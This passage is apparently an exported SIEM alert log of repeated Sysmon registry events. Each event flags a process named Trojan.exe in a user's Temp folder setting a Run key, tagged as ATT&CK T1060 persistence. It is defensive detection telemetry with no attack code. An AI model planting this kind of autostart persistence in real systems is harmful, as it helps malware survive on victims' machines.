..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:39.434921900Z"",""eventRecordID"":""1927"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:39.434\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:39.434"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:41.815",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:38.418 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:38.421345800Z"",""eventRecordID"":""1926"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:38.418\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:38.418"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:26:40.784",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:37.387 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:37.388186800Z"",""eventRecordID"":""1925"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:37.387\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:37.387"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:39.752",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:36.356 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:36.369623100Z"",""eventRecordID"":""1924"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:36.356\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:36.356"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:38.754",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:35.324 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:35.327415500Z"",""eventRecordID"":""1923"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:35.324\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:35.324"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:26:37.721",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:34.308 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:34.310205200Z"",""eventRecordID"":""1922"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:34.308\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:34.308"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:36.674",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:33.293 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:33.297982300Z"",""eventRecordID"":""1921"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:33.293\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:33.293"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:35.768",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:32.262 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:32.262670900Z"",""eventRecordID"":""1920"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:32.262\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:32.262"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:26:35.737",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:31.246 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:31.248142200Z"",""eventRecordID"":""1919"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:31.246\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:31.246"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:35.674",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:30.231 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:30.232122500Z"",""eventRecordID"":""1918"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:30.231\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:30.231"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:32.611",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:29.215 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:29.229626000Z"",""eventRecordID"":""1917"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:29.215\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:29.215"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:26:31.685",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:28.122 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 